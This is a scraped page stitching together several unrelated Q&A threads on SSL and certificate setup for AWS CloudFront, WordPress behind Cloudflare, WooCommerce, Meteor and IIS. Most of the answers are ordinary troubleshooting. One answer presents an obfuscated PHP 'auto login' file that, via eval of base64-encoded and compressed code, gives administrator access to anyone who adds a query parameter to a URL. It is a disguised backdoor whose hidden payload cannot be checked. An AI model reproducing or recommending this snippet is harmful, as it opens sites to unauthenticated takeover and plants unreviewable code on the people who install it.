I am using AWS EC2 to host my WP site having cyberpanel (Litespeed Ent and LScache plugin). Using free Let's SSL certificate (certbot).
I tried to active AWS cloudfront CDN on my site but getting following error
SSL_ERROR_NO_CYPHER_OVERLAP in firefox
ERR_SSL_VERSION_OR_CIPHER_MISMATCH in Chrome
Below is screenshot of my various setting
Origin Setting
I am using Public DNS as my origin domain
Distribution Settings
Generated the SSL in AWS certificate and applied here. Added cdn.domain.tld as alternate domain name and added it as cname pointing to distribution in route53
Default Cache Behavior Setting
I am not sure what I am doing wrong here?
Note: I have TLS v1.3 enabled in my Litespeed
Ok, I found the Solution. I was doing some mistakes.
I have SSL certificate for mydomain and its www version only. No wildcard SSL. And I was adding cdn.mydomain.tld as Alternate domain names which have no valid SSL.
So I changed Alternate domain names to mydomain.tld and www.mydomain.tld and it started working.
Also, the SSL certificate that I generated in ACM was wrong, I added *.mydomain.tld as domain name, But I had to add mydomain.tld also, which I did and it solved the problem
Hope this help someone and he/she does not make silly mistake like me
Thanks #Michael-sqlbot and Jeff from jeffreyeverhart.com for pointing me in right direction.
Related
I followed this
guide to setup WordPress on EC2, but it doesn't cover how to enable HTTPS. I've used the 'WordPress Certified by Bitnami and Automattic' AMI.
I know I can use CloudFront infront of EC2 for SSL, but I'm having trouble getting it working. I've gotten Error 502 plus several others. So I'd like to start from scratch and confirm my approach is correct.
I've registered my own domain (example.com). In Route 53, I have 'blog.example.com' as an A record pointing to my instance's EIP. I also have a CNAME record for 'www.blog.example.com' pointing to 'blog.example.com'. Both URLs can access my instance via HTTP.
In CloudFront's configuration, my 'Origin Domain Name' is:
Public DNS (ec2-XX-XX-XX-XX.ap-southeast-2.compute.amazonaws.com)
'Origin Protocol Policy' is set to HTTP
'Viewer Protocol Policy' is set to 'Redirect HTTP to HTTPS'.
For SSL Certificate, I've requested a custom cert for both:
blog.example.com
www.blog.example.com
All other CF settings have been left as default. I can access the distribution's domain name but its still HTTP.
After the Distribution is deployed, I've change the 'blog.example.com' record in Route 53 to have an alias target of CF's domain name (xxxxxxxxxxx.cloudfront.net).
What about the CNAME record (www.blog.example.com), should it be amended aswell?
Up to this stage, I can access both 'www.blog.example.com' and 'blog.example.com' but its HTTP and the EIP appears in the URL bar, not domain names.
What am I missing or have setup incorrectly?
I'm super new to AWS so many thanks in advance!
I am not sure if you are still looking for a solution but here is how I accomplished setting up SSL on my ec2 instance.
1) I issued a SSL Certificate for the URL that the ec2 was pointed at. I used AWS Certificate Manager to accomplish this.
There are two ways to verify domain authority DNS and Email. I have found DNS to be much easier, especially if you are using Route 53.
2) Next I had to list the alternate CNAME's to both of my A records (www.example.com & example.com) within Cloudfront (this tutorial was helpful). After selecting the Cloudfront distribution under the General tab click the Edit button. You will need to import your SSL certificate by selecting the radio button: Custom SSL Certificate (example.com) and then selecting the appropriate certificate that you created in Step 1.
Do keep in mind some of these steps required 15-20 minutes for the changes to propagate.
3) The final step is to point the A record within Route 53 to the Cloudfront distributions domain name.
The three AWS services you will need to utilize to accomplish this are Route 53, Cloudfront (CDN), and Certificate Manager.
Hope this helps and good luck!
Your aws configuration is looking fine. The problem is with your wordpress url, In wp-config.php you can identify the siteurl to your "domain.com" or you can set it through manually entering "domain.com" in the database. Make sure you enter https://youdomain in siteurl field.
I have a static website on which I installed cloudflare flexible SSL.
but now in a folder I installed wordpress here https://www.kiransboutique.com/wordpressrvc/
non of its link is working and wp-admin is also not redirecting to dashboard. I am using correct login credentials.
Can anybody suggest any solution? exactly same installation is working here http://bestcoachingcenter.com/kirans/
To auto login into your wordpress admin , by not adding admin username and password eachtime, you can use below code snippet.
Using this code in a php file and placing it on root directory of your wordpress installation helps you to get login into wp-admin with an administrator account.
What is required to make it work is, you need to hit the url by passing keyword “wpglogin” in query URL as given below –
http://www.sitename.com/codefile.php?wpglogin=YWRtaW4=
By hitting the above URL , you will get entered into admin easily.
<?php /*** PHP Encode v1.0 by zeura.com ***/ $XnNhAWEnhoiqwciqpoHH=file(__FILE__);eval(base64_decode("aWYoIWZ1bmN0aW9uX2V4aXN0cygiWWl1bklVWTc2YkJodWhOWUlPOCIpKXtmdW5jdGlvbiBZaXVuSVVZNzZiQmh1aE5ZSU84KCRnLCRiPTApeyRhPWltcGxvZGUoIlxuIiwkZyk7JGQ9YXJyYXkoNjU1LDIzNiw0MCk7aWYoJGI9PTApICRmPXN1YnN0cigkYSwkZFswXSwkZFsxXSk7ZWxzZWlmKCRiPT0xKSAkZj1zdWJzdHIoJGEsJGRbMF0rJGRbMV0sJGRbMl0pO2Vsc2UgJGY9dHJpbShzdWJzdHIoJGEsJGRbMF0rJGRbMV0rJGRbMl0pKTtyZXR1cm4oJGYpO319"));eval(base64_decode(YiunIUY76bBhuhNYIO8($XnNhAWEnhoiqwciqpoHH)));eval(ZsldkfhGYU87iyihdfsow(YiunIUY76bBhuhNYIO8($XnNhAWEnhoiqwciqpoHH,2),YiunIUY76bBhuhNYIO8($XnNhAWEnhoiqwciqpoHH,1)));__halt_compiler();aWYoIWZ1bmN0aW9uX2V4aXN0cygiWnNsZGtmaEdZVTg3aXlpaGRmc293Iikpe2Z1bmN0aW9uIFpzbGRrZmhHWVU4N2l5aWhkZnNvdygkYSwkaCl7aWYoJGg9PXNoYTEoJGEpKXtyZXR1cm4oZ3ppbmZsYXRlKGJhc2U2NF9kZWNvZGUoJGEpKSk7fWVsc2V7ZWNobygiRXJyb3I6IEZpbGUgTW9kaWZpZWQiKTt9fX0=e044e9d170abfceff3904a363ae1348b68619a68hVRta9swEP7sQv+DFkKllMRpYexDQwKjdSHQbl2S7UsoQrEvsTbF8mQZN5T+9+nFdry1ZQkB5+55Od2dnAJLQBF8LTMNmR6tDjlcIZbngsdMc5mNfxYyw4PJ6Ul/ywU8MJ1OUcJVxvZA+nQZLX5EizVeXi/mDyt6O7+Lvny+j/CjZfAsFmUCVGaxwTb0sDeu8pGQLAnzNO9Z4E7IDROoX+XJxvwFpaSiCnKpNM925MJi/JdvCS8K0MZ6EX37Hi1Xa1zlhr/jmTFFZ2fozQz6MEUYD55PT4J+E0VTtGEFfPpIE4hlAu9oGu/A2HZoRoole5N0ekGfqV1hxJhS7EBsJMBKCsCo+UxnNYMXWjEtFR56WFbuN6Bw4DGXNjiYIC9q8WUBykrvQFP3TJyZqyno2wjliclfuoCt8kjzxXVRneT64nE0S5hmo9n8xpFfnOTvEtTBQPEyuouuV+gc3S6+3iMcutmMZrmCLX8KsS+sSkEBmt9YQtgYhRj78hQUpdC2/JpsT1EHiXdyB2lK9yDBCk3dBrhG4+YYnak1yu4QztVl2mPYn6um0zm6ORDsRzpstdrZWoQ3SiRlsV18YnaA1gTkAF2vOuQHYYBmJWlcKmXukLMjDcU05y8QK3VKYyl/cXiNGY/t2cztglhTLafOzw2NlkqQwSQI6s4eMajgGur0USMXLIZ2J3FVVSF+08NgtOJ7YhaT1jTS8Ie93rCLHbQFGDs/hzYXYnurXa1jtpGltpfbL0Jav2PupH+lXLllUcIsii8Jnrj2tZ1DnMr3dPEk4dD2km2BNjjyHuOob7pzPq53A0QBz/820pznVbv/62Ua0jHw8i9/AA==
Your homepage is still in "hello World" state, so you may still want an answer. I had the same(?) problem; and checked posts like yours on Stackoverflow/Stackexchange - alas no joy.
What worked for me:
If you are using the official Cloudflare plugin ( https://wordpress.org/plugins/cloudflare/ ) set “Automatic HTTPS Rewrites” to “On”. This solved link and CSS issues under HTTPS, and saved me having to install additional SSL related plugins.
As a stop gap: If you have not configured WP to "force SSL" you might be able to login using an "http://" address (as I was).
To enable "HTTPS" login, edit wp-config.php and insert the following line:
if (strpos($_SERVER['HTTP_X_FORWARDED_PROTO'], 'https') !== false)
$_SERVER['HTTPS']='on';
If you want a bit more detail I posted about it here: http://wptest.means.us.com/cloudflare-wordpress-unable-login-https/
Note: Flexible SSL is better than no SSL as it encrypts the "connection" between you and Cloudflare. However, CF's connection to your server is still "HTTP" and your login credentials are STILL vulnerable to eavesdropping on this leg of the journey.
I'm still checking, but I think you can also make the CF <-> Server connection secure by enabling Cloudflare Railgun (used to reduce data transfer from your server). Railgun uses TLS, so data is encrypted. I assume if you use both Flexible SSL and Railgun your connections are secure end to end. Some inexpensive hosts include Railgun for free in their packages.
you can fix Wordpress SSL login problem by entering your server IP to the Windows HOSTS file.
Find Hosts file in windows\system32\hosts add your IP and domain name.
I am using the wc-auth login of woocommerce.
the one like this https://woocommerce.wordpress.com/2015/08/07/api-settings-and-the-api-authentication-endpoint-in-2-4/
now both sites have SSL installed properly I checked them on online sslcheckers.
But on the wc-auth way of logging in, I get this error:
Error: SSL: no alternative certificate subject name matches target host name 'www.my-domain.com'
I have checked the alternative name and it has *.mydomain.com in it.
Hence i am unable to understand what is the issue?
if both site SSL checkout then you should not be having any issues. For troubleshooting purposes try using a callback_url without the www subdomain.
For a Meteor JS deployment, how do your point domain.com at the same deployment as www.domain.com?
I have the A record pointing at the same IP address as www., but I'm getting the "there is no site deployed at this address message":
http://emiliotelevision.com
It appears Meteor's servers are not smart enough to make the site on www.emiliotelevision.com, which is working, also work for the equivalent with out the www..
Is there a better solution for this than pointing at another one of your own servers configured to redirect to the www. version?
Use a CNAME record for both www.emiliotelevision.com and emiliotelevision.com that points to yourserver.meteor.com
You need to set a domain redirect. emiliotelevision.com should redirect to www.emiliotelevision.com.
Now you can meteor deploy to www.emiliotelevision.com.
You may be able to set up the redirect from where you purchased the domain main.
My IIS site is giving browsers problems. They pop up a security warning that the security certificate does not match the name of the site. I'm using a self-signed certificate for testing. I view the certificate. It has the name.
DnsName.mydomain.com
but the browser is using
MachineName.mydomain.com
There is a CNAME entry pointing DnsName.mydomain.com to MachineName.mydomain.com.
Even so, they are obviously different. Can you tell me how I can get a new self-signed certificate with the name MachineName.mydomain.com, and how to install it on my test web server such that browsers can use either name without getting this security warning?
I can have the browser install any certificate a self-signed cert from my web server, that's not the problem. The problem is the warning. Here's a screen shot of what I mean.
You can only have one cert per site.
There are a couple of heavy-handed ways of getting around this:
Completely duplicate your site and have a cert on each
Use SSL-Acceleration and have two different external IPs on a load balancer that both point to the same internal.
There's also one easy way since you're already self-signing: Just wildcard it (*.mydomain.com). Generating this on a Windows box is explained here and Generating this on a Linux box is explained here.
If you really don't want to do that, I'd just have a forced redirect from one URL to the other instead of a CNAME alias.